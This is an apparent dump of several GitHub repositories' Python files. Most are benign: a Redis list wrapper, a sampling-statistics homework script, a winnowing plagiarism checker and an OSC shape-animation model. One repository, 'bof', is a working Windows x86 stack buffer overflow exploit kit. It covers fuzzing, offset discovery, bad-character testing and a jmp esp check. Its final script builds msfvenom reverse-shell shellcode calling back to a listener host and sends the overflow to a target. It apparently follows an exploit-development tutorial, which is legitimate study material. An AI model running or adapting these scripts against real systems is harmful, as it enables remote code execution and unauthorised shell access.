    def read(self, start=LEFTMOST, stop=RIGHTMOST):
        # LRANGE: items in [start, stop]; defaults to the whole list.
        return self.client.lrange(self.name, start, stop)
    def length(self):
        # LLEN: number of items in the list.
        return self.client.llen(self.name)
    def clear(self):
        # 'del' is a Python keyword, so redis-py exposes the DEL command
        # as delete().
        self.client.delete(self.name)
    def keep(self, size):
        # LTRIM: keep only the first *size* items, dropping the rest.
        self.client.ltrim(self.name, LEFTMOST, size - 1)
if __name__ == '__main__':
    import json
    # Smoke test (Python 2 script): push four JSON payloads, trim to the
    # newest three, then delete the key again.
    client = Redis(host='localhost', port=6379, db=0)
    list_operate_client = RedisListSecondPack('SHOWPAYBIZ000001', client)
    for x in range(4):
        list_operate_client.left_append(json.dumps({'a': 'my %s data' % str(x)}))
    print list_operate_client.read(), list_operate_client.length()
    list_operate_client.keep(3)
    print list_operate_client.read(), list_operate_client.length()
    list_operate_client.clear()
| Python | 51 | 26.235294 | 81 | /redis_list_operate.py | 0.636755 | 0.624551 |
Maheerr2707/C-111HW | refs/heads/main | import plotly.figure_factory as ff
import pandas as pd
import csv
import statistics
import random
import plotly.graph_objects as go
# Population: every math score in the survey data set.
df = pd.read_csv("StudentsPerformance.csv")
data = df["mathscore"].tolist()
""" fig = ff.create_distplot([data], ["Math Scores"], show_hist=False)
fig.show() """
# Population statistics used as the baseline for the z-scores below.
P_mean = statistics.mean(data)
P_stdev = statistics.stdev(data)
print("Mean of the Population: ", P_mean)
print("Standard Deviation of the Population: ", P_stdev)
def randomSetOfMeans(counter):
    """Return the mean of `counter` scores drawn (with replacement) from `data`.

    Uses random.choices, which performs the with-replacement sampling the
    original implemented by hand with randint-based list indexing.
    """
    return statistics.mean(random.choices(data, k=counter))
# Sampling distribution: 100 means of samples of size 30.
meanList = []
for i in range (0,100):
    setOfMeans = randomSetOfMeans(30)
    meanList.append(setOfMeans)
S_mean = statistics.mean(meanList)
S_stdev = statistics.stdev(meanList)
print("Mean of the Sample: ", S_mean)
print("Standard Deviation of the Sample: ", S_stdev)
# Boundaries of the 1st/2nd/3rd population standard-deviation bands.
first_stdev_start, first_stdev_end = P_mean - P_stdev, P_mean + P_stdev
second_stdev_start, second_stdev_end = P_mean - (2*P_stdev), P_mean + (2*P_stdev)
third_stdev_start, third_stdev_end = P_mean - (3*P_stdev), P_mean + (3*P_stdev)
# Distribution of sample means with mean and stdev bands overlaid.
fig = ff.create_distplot([meanList], ["Math Scores"], show_hist=False)
fig.add_trace(go.Scatter(x=[P_mean, P_mean], y=[0, 0.17], mode="lines", name="MEAN"))
fig.add_trace(go.Scatter(x=[first_stdev_start, first_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
fig.add_trace(go.Scatter(x=[first_stdev_end, first_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
fig.add_trace(go.Scatter(x=[second_stdev_start, second_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
fig.add_trace(go.Scatter(x=[second_stdev_end, second_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
fig.add_trace(go.Scatter(x=[third_stdev_start, third_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
fig.add_trace(go.Scatter(x=[third_stdev_end, third_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
#First Intervention Data Analyzation
df_1 = pd.read_csv("Inter1.csv")
data_1 = df_1["mathscore"].tolist()
meanOfSample1 = statistics.mean(data_1)
print("Mean of Sample 1: ", meanOfSample1)
fig.add_trace(go.Scatter(x=[meanOfSample1, meanOfSample1], y=[0, 0.17], mode="lines", name="Mean of Sample 1"))
#Third Intervention Data Analyzation
df_3 = pd.read_csv("Inter3.csv")
data_3 = df_3["mathscore"].tolist()
meanOfSample3 = statistics.mean(data_3)
print("Mean of Sample 3: ", meanOfSample3)
fig.add_trace(go.Scatter(x=[meanOfSample3, meanOfSample3], y=[0, 0.17], mode="lines", name="Mean of Sample 3"))
fig.show()
#Z-Score
# How many population standard deviations each intervention mean lies
# from the population mean.
ZScore = (meanOfSample1-P_mean)/P_stdev
print("Z-Score 1: ", ZScore)
ZScore3 = (meanOfSample3-P_mean)/P_stdev
print("Z-Score 3: ", ZScore3)
| Python | 75 | 37.546665 | 125 | /mean.py | 0.677006 | 0.649022 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import struct, functions, subprocess
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
ptr_jmp_esp = functions.getPtrJmpEsp()
LHOST = functions.getLhost()
LPORT = functions.getLport()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
# instead of using NOPs, drag ESP up the stack to avoid GetPC issues
# note: when modifying ESP, always ensure that it remains divisible by 4
sub_esp_10 = "\x83\xec\x10"
LHOSTstr = "LHOST=" + LHOST
LPORTstr = "LPORT=" + str(LPORT)
# import shellcode from shellcode.py; or create shellcode if not exists
try:
import shellcode
print "shellcode.py already exists - using that shellcode..."
except:
badchars = [struct.pack("B", x).encode("hex") for x in functions.getBadChars()]
# print badchars
for x in range(0, len(badchars)):
badchars[x] = '\\x' + badchars[x]
# print a[x]
# print badchars
badcharsstr = "'" + ''.join(badchars) + "'"
print "badcharsstr =", badcharsstr
cmd = ["msfvenom", "-p", "windows/shell_reverse_tcp", LHOSTstr, LPORTstr, "EXITFUNC=thread", "-v", "shellcode", "-b", badcharsstr, "-f", "python", "-o", "shellcode.py"]
print ' '.join(cmd)
try:
subprocess.check_output(cmd)
import shellcode
except:
print "Error generating shellcode :("
exit()
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite
buf += sub_esp_10 # ESP points here
buf += shellcode.shellcode
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf.encode("hex")
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Caught reverse shell?"
| Python | 72 | 30.513889 | 172 | /7_reverse_shell.py | 0.669458 | 0.662847 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Used to test bad characters as part of the process in developing a
# Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions, argparse
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
parser = argparse.ArgumentParser()
parser.add_argument("-b", help="Bad characters in hex format, no spaces, eg. 0x0A,0x7B", dest='additional_bchars', nargs='+')
args = parser.parse_args()
print "Additional bad chars =", str(args.additional_bchars)
badchar_test = "" # start with an empty string
badchars = [0x00, 0x0A] # we've reasoned that these are definitely bad
if args.additional_bchars is not None:
extras = args.additional_bchars[0].split(",") # split out by comma delimeter
for i in range(0, len(extras)):
extras[i] = int(extras[i], 16) # convert from str to hex int
badchars.append(extras[i]) # append bad char to badchars list
# remove any duplicates
badchars = list(dict.fromkeys(badchars))
print "badchars =", [hex(x) for x in badchars]
# TODO check to see if badchars already exists...
functions.writeParamToFile("badchars", badchars)
# generate the string
for i in range(0x00, 0xFF+1): # range(0x00, 0xFF) only returns up to 0xFE
if i not in badchars: # skip the badchars
badchar_test += chr(i) # append each non-badchar to the string
try:
# open a file for writing ("w") the string as binary ("b") data
with open("badchar_test.bin", "wb") as f:
f.write(badchar_test)
except:
print "Error when writing to file. Quitting..."
quit()
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += "BBBB" # SRP overwrite
buf += badchar_test # ESP points here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "\nSet up mona byte array as follows:"
print "!mona bytearray -cpb \"\\x00\\x0a<other bad chars>\"\n"
print "Use \"!mona cmp -a esp -f C:\\path\\bytearray.bin\" to check bad chars."
print "Then run \"!mona jmp -r esp -cpb \"\\x00\\x0a<other bad chars>\" to search for \"jmp esp\" memory addresses."
print "\nAlso try \"!mona modules\" to find an unprotected module, followed by"
print "\"!mona find -s \"\\xff\\xe4\" -cpb \"\\x00\\x0a<other bad chars>\" -m <module_name>\""
print "\nEnter discovered jmp esp (or \\xff\\xe4) memory address at next step."
| Python | 80 | 36.400002 | 125 | /4_test_badchars.py | 0.671123 | 0.658088 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
import socket, argparse
parser = argparse.ArgumentParser()
parser.add_argument("RHOST", help="Remote host IP")
parser.add_argument("RPORT", help="Remote host port", type=int)
parser.add_argument("-l", help="Max buffer length in bytes; default 1024", type=int, default=1024, dest='buf_len')
args = parser.parse_args()
buf = "A" * args.buf_len + "\n"
print buf
print "Attempting to connect to service..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((args.RHOST, args.RPORT))
print "Sending %s A's..." % args.buf_len
s.send(buf)
print "%s A's sent." % args.buf_len
except:
print "Error connecting to service..."
| Python | 29 | 23.482759 | 114 | /1_trigger_bug.py | 0.673239 | 0.660563 |
yokel72/bof | refs/heads/master | # Functions supporting a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import socket, struct
# import params from params.py; or create an empty file if not exists
try:
import params
except:
open('params.py', 'a').close()
print "params.py created for parameter persistence."
# write parameter to file for persistence
def writeParamToFile(param_name, param_value):
with open("params.py", "a") as f:
f.write("%s = %s\n" % (param_name, param_value))
# return remote host (target) IP address
def getRhost():
try:
return params.RHOST
except:
RHOST = raw_input("RHOST: ")
writeParamToFile("RHOST", '\"' + RHOST + '\"')
return RHOST
# return remote host (target) port
def getRport():
try:
return params.RPORT
except:
RPORT = raw_input("RPORT: ")
writeParamToFile("RPORT", RPORT)
return int(RPORT)
# return local host (listening) IP address
def getLhost():
try:
return params.LHOST
except:
LHOST = raw_input("LHOST: ")
writeParamToFile("LHOST", '\"' + LHOST + '\"')
return LHOST
# return local host (listening) port
def getLport():
try:
return params.LPORT
except:
LPORT = raw_input("LPORT: ")
writeParamToFile("LPORT", LPORT)
return int(LPORT)
# return max buffer length
def getBufTotlen():
try:
return params.buf_totlen
except:
buf_totlen = raw_input("Max buffer length: ")
writeParamToFile("buf_totlen", buf_totlen)
return int(buf_totlen)
# return Saved Return Pointer offset
def getOffsetSrp():
try:
return params.offset_srp
except:
offset_srp = raw_input("offset_srp: ")
writeParamToFile("offset_srp", offset_srp)
return int(offset_srp)
# return pointer address to jmp esp
def getPtrJmpEsp():
try:
return params.ptr_jmp_esp
except:
ptr_jmp_esp = raw_input("ptr_jmp_esp: ")
writeParamToFile("ptr_jmp_esp", ptr_jmp_esp)
return int(ptr_jmp_esp, 16)
# return bad characters
def getBadChars():
try:
# return [hex(x) for x in params.badchars]
return params.badchars
except:
input = raw_input("Enter bad characters in hex format, no spaces, eg. 0x0A,0x7B: ")
input = input.split(",") # split out by comma delimeter
badchars = []
for i in range(0, len(input)):
input[i] = int(input[i], 16) # convert from str to hex int
badchars.append(input[i]) # append bad char to badchars list
# remove any duplicates
badchars = list(dict.fromkeys(badchars))
# writeParamToFile("badchars", '\"' + badchars + '\"')
writeParamToFile("badchars", badchars)
return badchars
# connect to remote host (target) and send buffer
# return 0 for success; return 1 for failure
def sendBuffer(RHOST, RPORT, buf):
print "Attempting to connect to service..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((RHOST, RPORT))
print "Sending buffer..."
# this part may need to be modified depending on which command is vulnerable in the target service
s.send(buf)
s.close()
print "Buffer sent."
return 0
except:
print "Error connecting to service..."
return 1
# return unique pattern of desired length
def pattern_create(length):
pattern = ''
parts = ['A', 'a', '0']
while len(pattern) != length:
pattern += parts[len(pattern) % 3]
if len(pattern) % 3 == 0:
parts[2] = chr(ord(parts[2]) + 1)
if parts[2] > '9':
parts[2] = '0'
parts[1] = chr(ord(parts[1]) + 1)
if parts[1] > 'z':
parts[1] = 'a'
parts[0] = chr(ord(parts[0]) + 1)
if parts[0] > 'Z':
parts[0] = 'A'
return pattern
# return pattern offset given a unique pattern and value to search for
def pattern_offset(value, pattern):
value = struct.pack('<I', int(value, 16)).strip('\x00')
print "value =", value
try:
return pattern.index(value)
except ValueError:
print "Pattern not found..."
return "Not found"
| Python | 159 | 28.27673 | 106 | /functions.py | 0.602363 | 0.593126 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Generates and sends a unique pattern to a service as part of the process in
# developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
print "RHOST=%s; RPORT=%s; buf_totlen=%s" % (RHOST, RPORT, buf_totlen)
pattern = functions.pattern_create(buf_totlen)
pattern += '\n'
print pattern
sent = functions.sendBuffer(RHOST, RPORT, pattern)
if sent is 0:
print "EIP should now be overwritten."
eip_value = raw_input("EIP value: ")
offset_srp = functions.pattern_offset(eip_value, pattern)
print "offset_srp =", offset_srp
if "offset_srp" in open("params.py", "r").read() and offset_srp != functions.getOffsetSrp():
print "Something went wrong...offset_srp is already defined in params.py as %s" % functions.getOffsetSrp()
elif isinstance(offset_srp, int):
functions.writeParamToFile("offset_srp", offset_srp)
else:
print "Error: offset could not be found."
| Python | 38 | 35.342106 | 114 | /2_discover_offset.py | 0.727009 | 0.723389 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Uses a software interrupt to test the jmp esp functionality as part of the
# process in developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import struct, functions
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
ptr_jmp_esp = functions.getPtrJmpEsp()
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite. Converts to little endian
buf += "\xCC\xCC\xCC\xCC" # ESP points here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Caught software interrupt?"
| Python | 36 | 33.027779 | 131 | /5_jmp_esp_interrupt.py | 0.713469 | 0.709388 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
import socket, argparse, time
parser = argparse.ArgumentParser()
parser.add_argument("RHOST", help="Remote host IP")
parser.add_argument("RPORT", help="Remote host port", type=int)
parser.add_argument("-l", help="Max number of bytes to send; default 1000", type=int, default=1000, dest='max_num_bytes')
args = parser.parse_args()
for i in range(100, args.max_num_bytes+1, 100):
buf = "A" * i
print "Fuzzing service with %s bytes" % i
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((args.RHOST, args.RPORT))
s.send(buf + '\n')
s.recv(1024)
s.close()
time.sleep(0.5)
except:
print "Error connecting to service..."
if len(buf) > 100:
print "Crash occurred with buffer length: " + str(len(buf))
exit()
| Python | 31 | 27.193548 | 121 | /fuzzer.py | 0.614416 | 0.585812 |
yokel72/bof | refs/heads/master | #!/usr/bin/env python
# Used to confirm that the suspected offset is indeed correct. This is part of
# the process in developing a Windows x86 reverse shell stack buffer overflow
# Saved Return Pointer overwrite exploit.
# Parameters are saved in params.py for persistence.
# Delete params.py and params.pyc to reset them; or simply edit params.py
#
# Written by y0k3L
# Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
# https://github.com/justinsteven/dostackbufferoverflowgood
import functions, os
# get parameters
RHOST = functions.getRhost()
RPORT = functions.getRport()
buf_totlen = functions.getBufTotlen()
offset_srp = functions.getOffsetSrp()
if offset_srp > buf_totlen-300:
print "Warning: offset is close to max buffer length. Recommend increasing "
print "max buffer length (buf_totlen)"
print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
buf = ""
buf += "A" * (offset_srp - len(buf)) # padding
buf += "BBBB" # SRP overwrite
buf += "CCCC" # ESP should end up pointing here
buf += "D" * (buf_totlen - len(buf)) # trailing padding
buf += "\n"
# print buf
sent = functions.sendBuffer(RHOST, RPORT, buf)
if sent is 0:
print "Confirm that EBP is all 0x41's, EIP is all 0x42's, and ESP points "
print "to four 0x43's followed by many 0x44's"
| Python | 40 | 33.775002 | 97 | /3_confirm_offset.py | 0.692308 | 0.67793 |
qfolkner/RDL-Robot-Code | refs/heads/master | from __future__ import division
import time
import pygame
from adafruit_servokit import ServoKit
pygame.init()
pwm = ServoKit(channels=16)
leftstick = 0.07
rightstick = 0.07
liftUP = 0.00
liftDOWN = 0.00
print('Initialized')
gamepad = pygame.joystick.Joystick(0)
gamepad.init()
while True:
pygame.event.get()
if abs(gamepad.get_axis(1)) <= 0.1:
leftstick = 0.1
elif abs(gamepad.get_axis(4)) <= 0.1:
rightstick = 0.1
elif abs(gamepad.get_button(3)) <= 0.1:
liftUP = 0.1
elif abs(gamepad.get_button(0)) <= 0.1:
liftDOWN = 0.1
leftstick = gamepad.get_axis(1)
rightstick = gamepad.get_axis(4)
liftUP = gamepad.get_button(3)
liftDOWN = -gamepad.get_button(0)
pwm.continuous_servo[1].throttle = leftstick
pwm.continuous_servo[4].throttle = rightstick
pwm.continuous_servo[11].throttle = liftUP
pwm.continuous_servo[11].throttle = liftDOWN
print("rightstick: ", rightstick)
print("leftstick: ", leftstick)
print("lift: ", liftUP)
print("lift: ", liftDOWN)
#axis 0 = A
#axis 3 = Y | Python | 58 | 19.241379 | 49 | /servoGOOD.py | 0.602728 | 0.56266 |
FazilovDev/GraduateWork | refs/heads/main | from Algorithms.Winnowing import get_fingerprints, get_text_from_file
from tkinter import *
from tkinter import filedialog as fd
import locale
k = 15
q = 259#259
w = 4
class PlagiarismDetect(Frame):
def __init__(self, parent):
Frame.__init__(self, parent, background="white")
self.parent = parent
self.width = self.winfo_screenwidth()
self.height = self.winfo_screenheight()
self.parent.title("DetectPlagiarismMoss")
self.pack(fill=BOTH, expand=True)
self.file1 = 'file1'
self.file2 = 'file2'
self.create_main_menu()
def choice_f1(self):
self.file1 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'), ('Py', '.py')])
self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
def choice_f2(self):
self.file2 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'),('Py', '.py')])
self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
def print_file1(self,text, points, side):
newCode = text[: points[0][0]]
if side == 0:
textfield = self.text1
else:
textfield = self.text2
textfield.insert('end', newCode)
plagCount = 0
for i in range(len(points)):
if points[i][1] > points[i][0]:
plagCount += points[i][1] - points[i][0]
newCode = newCode + text[points[i][0] : points[i][1]]
textfield.insert('end', text[points[i][0] : points[i][1]], 'warning')
if i < len(points) - 1:
newCode = newCode + text[points[i][1] : points[i+1][0]]
textfield.insert('end', text[points[i][1] : points[i+1][0]])
else:
newCode = newCode + text[points[i][1] :]
textfield.insert('end', text[points[i][1] :])
return plagCount / len(text)
def analyze(self):
self.text1.tag_config('warning', background="orange",)
self.text2.tag_config('warning', background="orange")
text1 = get_text_from_file(self.file1)
text2 = get_text_from_file(self.file2)
mergedPoints = get_fingerprints(self.file1, self.file2, k, q, w)
res = self.print_file1(text1, mergedPoints[0], 0)
res1 = self.print_file1(text2, mergedPoints[1], 1)
self.text_plagiarism['text'] = "Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format(self.file1.split('/')[-1::][0], int((1-res)*100), self.file2.split('/')[-1::][0], int((1-res1)*100))
def create_main_menu(self):
frame1 = Frame(self)
frame1.pack(fill=X)
frame1.config(bg="white")
self.text_info_menu = Label(frame1, text="Загрузите \n{} \n{}:".format(self.file1, self.file2), font=("Arial Bold", 20))
self.text_info_menu.config(bg="white")
self.text_info_menu.pack()
self.text_plagiarism = Label(frame1, text="Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format("",0, "", 0), font=("Arial Bold", 20))
self.text_plagiarism.config(bg="white")
self.text_plagiarism.pack()
choice_file2 = Button(frame1, text="Файл №2", command=self.choice_f2)
choice_file2.pack(side=RIGHT, expand=True)
choice_file1 = Button(frame1, text="Файл №1", command=self.choice_f1)
choice_file1.pack(side=RIGHT, expand=True)
frame2 = Frame(self)
frame2.pack(fill=X)
frame2.config(bg="white")
analyze = Button(frame2, text="Обработать", command=self.analyze)
analyze.pack()
frame3 = Frame(self)
frame3.pack(fill=X)
frame3.config(bg="white")
self.text1 = Text(frame3, width=int(100), height=int(100))
self.text1.pack(side=LEFT)
self.text2 = Text(frame3, width=int(100), height=int(100))
self.text2.pack(side=LEFT)
def main():
locale.setlocale(locale.LC_ALL, 'ru_RU.UTF8')
root = Tk()
root.geometry("{}x{}".format(root.winfo_screenwidth(), root.winfo_screenheight()))
app = PlagiarismDetect(root)
root.mainloop()
if __name__ == '__main__':
main() | Python | 110 | 37.854546 | 207 | /main.py | 0.575942 | 0.546454 |
FazilovDev/GraduateWork | refs/heads/main | from Preprocessing.cleantext import *
class Gram:
def __init__(self, text, hash_gram, start_pos, end_pos):
self.text = text
self.hash = hash_gram
self.start_pos = start_pos
self.end_pos = end_pos
def get_text_from_file(filename):
with open(filename, 'r') as f:
text = f.read().lower()
return text
def get_text_processing(text):
stop_symbols = [' ', ',']
return ''.join(j for j in text if not j in stop_symbols)
def get_hash_from_gram(gram, q):
h = 0
k = len(gram)
for char in gram:
x = int(ord(char)-ord('a') + 1)
h = (h * k + x) % q
return h
def get_k_grams_from_text(text, k = 25, q = 31):
grams = []
for i in range(0, len(text)-k+1):
hash_gram = get_hash_from_gram(text[i:i+k], q)
gram = Gram(text[i:i+k], hash_gram, i, i+k)
grams.append(gram)
return grams
def get_hashes_from_grams(grams):
hashes = []
for gram in grams:
hashes.append(gram.hash)
return hashes
def min_index(window):
min_ = window[0]
min_i = 0
for i in range(len(window)):
if window[i] < min_:
min_ = window[i]
min_i = i
return min_i
def winnow(hashes, w):
n = len(hashes)
prints = []
windows = []
prev_min = 0
current_min = 0
for i in range(n - w):
window = hashes[i:i+w]
windows.append(window)
current_min = i + min_index(window)
if not current_min == prev_min:
prints.append(hashes[current_min])
prev_min = current_min
return prints
def get_points(fp1, fp2, token, hashes, grams):
points = []
for i in fp1:
for j in fp2:
if i == j:
flag = 0
startx = endx = None
match = hashes.index(i)
newStart = grams[match].start_pos
newEnd = grams[match].end_pos
for k in token:
if k[2] == newStart:
startx = k[1]
flag = 1
if k[2] == newEnd:
endx = k[1]
if flag == 1 and endx != None:
points.append([startx, endx])
points.sort(key = lambda x: x[0])
points = points[1:]
return points
def get_merged_points(points):
mergedPoints = []
mergedPoints.append(points[0])
for i in range(1, len(points)):
last = mergedPoints[len(mergedPoints) - 1]
if points[i][0] >= last[0] and points[i][0] <= last[1]:
if points[i][1] > last[1]:
mergedPoints = mergedPoints[: len(mergedPoints)-1]
mergedPoints.append([last[0], points[i][1]])
else:
pass
else:
mergedPoints.append(points[i])
return mergedPoints
def get_fingerprints(file1, file2, k, q, w):
token1 = tokenize(file1)
token2 = tokenize(file2)
text1proc = toText(token1)
text2proc = toText(token2)
grams1 = get_k_grams_from_text(text1proc, k, q)
grams2 = get_k_grams_from_text(text2proc, k, q)
hashes1 = get_hashes_from_grams(grams1)
hashes2 = get_hashes_from_grams(grams2)
fp1 = winnow(hashes1, w)
fp2 = winnow(hashes2, w)
points1 = get_points(fp1, fp2, token1, hashes1, grams1)
points2 = get_points(fp1, fp2, token2, hashes2, grams2)
merged_points1 = get_merged_points(points1)
merged_points2 = get_merged_points(points2)
return (merged_points1, merged_points2)
| Python | 127 | 26.826771 | 66 | /Algorithms/Winnowing.py | 0.53918 | 0.517397 |
sonir/vsyn_model | refs/heads/master | # if you want to use this library from outside of sonilab folder, should import as follows,
# from sonilab import sl_metro, sl_osc_send, osc_receive, event
# enjoy !!
import random
from sonilab import sl_metro, sl_osc_send, osc_receive, event
import shapes, shape, send_all
metro = sl_metro.Metro(0.016)
metro2 = sl_metro.Metro(0.5)
sender = sl_osc_send.slOscSend("127.0.0.1" , 57137)
receiver = osc_receive.OscReceive(57138)
ball_posi_a = 0.1
ball_posi_b = 0.9
ball_speed = 0.5
def osc_received (vals):
print "OSC RECEIVED :: arg[0] = " + str(vals[0]) + " | arg[1] = " + str(vals[1])
def send(adr, vals):
sender.send(adr, vals)
event.add("/test" , osc_received)
event.add("/send" , send)
receiver.setup("/foo")
def init():
global ball_posi_a, ball_posi_b
#Make Primitives
node1 = shape.Shape("/circle" , "node1") #set shape_type tag and unique name
node1.set("x1" , ball_posi_a)
node1.set("y1" , 0.5)
node1.set("size" , 0.005)
node1.set("fill" , 0)
shapes.add(node1.name , node1)
node2 = shape.Shape("/circle" , "node2") #set shape_type tag and unique name
node2.set("x1" , ball_posi_b)
node2.set("y1" , 0.5)
node2.set("size" , 0.005)
node2.set("fill" , 0)
shapes.add(node2.name , node2)
ball = shape.Shape("/circle" , "ball") #set shape_type tag and unique name
ball.set("x1" , ball_posi_a)
ball.set("y1" , 0.5)
ball.set("size" , 0.005)
ball.set("fill" , 1)
shapes.add(ball.name , ball)
arc = shape.Shape("/arc" , "arc") #set shape_type tag and unique name
arc.set("x1" , ball_posi_a)
arc.set("y1" , 0.5)
arc.set("x2" , ball_posi_b)
arc.set("y2" , 0.5)
arc.set("height", 0.3)
shapes.add(arc.name , arc)
wave = shape.Shape("/wave", "wave")
wave.set("x1" , ball_posi_a)
wave.set("y1" , 0.5)
wave.set("x2" , ball_posi_b)
wave.set("y2" , 0.5)
wave.set("height", 0.3)
wave.set("freq" , 4.0)
wave.set("phase", 0.0)
shapes.add(wave.name , wave)
def get_primitive(name):
tmp = shapes.get_primitive(name)
return tmp[1] #<- shapes.get_primitive returns a tupple. It includes the shape_tag(same as osc_address) and the list of parameters.
def move_ball():
print "move_ball"
global ball_posi_a, ball_posi_b, ball_speed
ball = shapes.get("ball")
arc = shapes.get("arc")
wave = shapes.get("wave")
ball_x = ball.get('x1')
print ball_x
if ball_x == ball_posi_a:
print "A"
ball.set("x1" , ball_posi_b, ball_speed)
arc.set("height", 0.3, ball_speed)
wave.set("freq", 7.0, ball_speed)
elif ball_x == ball_posi_b:
print "B"
ball.set("x1" , ball_posi_a, ball_speed)
arc.set("height", -0.3, ball_speed)
wave.set("freq", 2.0, ball_speed)
def draw():
dic = shapes.get_all()
send_all.run(dic)
try :
#INIT all objects
init()
prim = None
#Start Loop
while True:
if metro.update():
draw()
if metro2.update(): #write code to execute every 1 sec
prim = get_primitive("ball")
print "x1 = " , prim[1] , " : y1 = " , prim[2]
if random.randint(0,1) == 1:
move_ball() #move ball with 50 percent rate in each round
except KeyboardInterrupt :
receiver.terminate()
| Python | 125 | 25.808001 | 135 | /_main.py | 0.586691 | 0.549985 |
sonir/vsyn_model | refs/heads/master | import threading
from sonilab import event
import shape
"""
Shapes treats array of shape.
"""
LOCK = threading.Lock()
data = {}
count = 0
def add(name, obj):
global LOCK , count
with LOCK:
data[name]=(count , obj)
count += 1
def get_primitive(name):
tuple_uid_and_obj = data[name]
uid = tuple_uid_and_obj[0]
obj = tuple_uid_and_obj[1]
tuple_address_and_params = obj.get_primitive()
adr = tuple_address_and_params[0]
params = tuple_address_and_params[1]
params.insert(0, uid)
return (adr,params)
def get_all():
container = []
for elm in data:
tmp = data[elm]
container.append( get_primitive(tmp[1].name) )
return container
def get(name):
tuple_uid_and_obj = data[name]
return tuple_uid_and_obj[1]
def set(name, variable, *args):
if args:
tuple_uid_and_obj = data[name]
obj = tuple_uid_and_obj[1]
obj.set(variable, *args)
def print_all():
print "--- [shapes : print_all() ] ---"
for elm in data:
tmp = data[elm]
obj = tmp[1]
tmp = obj.get_primitive()
params = tmp[1]
print elm , obj
for param in params:
print param ,
print "\n--"
print "--- [print_all() : end] ---"
